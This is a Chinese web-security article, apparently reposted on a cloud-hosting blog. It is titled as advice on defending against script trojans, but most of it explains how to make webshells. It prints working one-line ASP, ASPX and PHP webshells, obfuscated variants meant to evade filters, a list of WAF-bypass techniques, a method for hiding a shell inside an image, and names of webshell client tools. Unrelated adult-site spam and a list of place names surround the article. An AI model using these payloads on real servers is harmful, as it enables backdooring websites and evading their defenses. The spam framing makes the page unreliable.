中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

web安全中腳本木馬如何防御

發布時間:2021-12-20 09:54:35 來源:億速云 閱讀:276 作者:小新 欄目:網絡管理

這篇文章給大家分享的是有關web安全中腳本木馬如何防御的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

腳本木馬的制作原理

webshell就是一種網頁后門(web后門)

webshell制作原理
webshell使用技巧
webshell"黑吃黑"

一. webshell制作原理

一句話木馬(2010年出來)--> 上傳大馬進行提權
小馬                --> 上傳大馬進行提權
大馬
打包馬
脫褲馬
執行命令馬

GetShell就是拿webshell的動作

1. 一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用

asp : 
<% execute request("value") %>
<%eval request ("pass")%>
--------------------------------------
sms2056.com/x.asp?value="cmd"
aspx : 
<%@ Page Language="Jscript"%>
<%eval(Request.I tem["pass"]," uns afe");%>
PHP : 
<?php @eval($_POST['attack']) ?>

2. 工作原理

黑客在注冊信息的電子郵箱或個人主頁等中插入類似如下代碼:

<%eval request ("pass")%>

其中pass是值,所以你可以更改自己的值,前面的request就是獲取這個值

上述代碼現在比較多見,而且字符數少,對表單字數有限制的地方特別的實用

當知道了數據庫的URL,就可以利用本地一張網頁進行連接得到WebShell(不知道數據庫也可以,只要知道一句話木馬的文件被插入到那一個ASP文件里面就可以了)

一句話木馬是基于B/S結構的

3. 一句話木馬變形

<?php $_GET['a']($_POST['b']) ?>
---------------------------------------
x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%>
---------------------------------------
aspcms2.0以上會檢查腳本中的雙引號""",單引號"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>

4. 一般WAF繞過方式

函數繞過
編碼繞過
可變變量繞過
動態獲取參數繞過

5. 一句話圖片馬的制作

C32下做一句話
打開c32, 把圖片放里面,寫入一句話保存,退出
cmd下做一句話
copy /b 1.jpg+1.asp 2.jpg
win7下右鍵圖片,在屬性 -> 詳細信息 -> 版權內插入一句話即可

6. 常見的一句話客戶端

中國菜刀
中國砍刀
蟻劍
C刀
lanker一句話客戶端
ZV新型PHP一句話木馬客戶端GUI版
一句話客戶端增強版

7. 大馬

大馬體積比較大,一般50kb以上.功能也多,一般都包含提權命令,磁盤管理,數據庫連接接口,執行命令甚至有些以具備自帶提權功能和壓縮,解壓縮網站程序的功能.這種馬隱蔽性不好,而大多代碼如不加密的話很多殺毒廠商開始追殺此類程序 .

用途 : 
提權
打包
脫褲
增刪文件

8. 小馬

作用主要用戶上傳大馬

二. webshell使用技巧

內容編碼
配合解析漏洞
配合文件包含
利用文件名溢出

三. webshell"黑吃黑"

http://xss.fbisb.com/xss.php?do=login

1. 找shell后門

查找后門
查找webshell后門
找到后門地址
反搞wehshell箱子

2. 找一句話客戶端后門

查找客戶端后門
找到后門地址
反搞wehshell箱子

感謝各位的閱讀!關于“web安全中腳本木馬如何防御”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節
推薦閱讀:
  1. web安全之XSS
  2. web安全

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

web
AI

陈巴尔虎旗| 建湖县| 上虞市| 三台县| 洛浦县| 荥经县| 昔阳县| 麻栗坡县| 靖安县| 无棣县| 鄂伦春自治旗| 台北市| 祁东县| 巧家县| 仁化县| 隆子县| 沛县| 安远县| 宜宾县| 洛川县| 阳泉市| 稷山县| 芜湖县| 和林格尔县| 阿城市| 磐安县| 葫芦岛市| 喀喇| 湟中县| 东兴市| 远安县| 永定县| 保亭| 滕州市| 长白| 宣恩县| 外汇| 太湖县| 开阳县| 无锡市| 翁源县|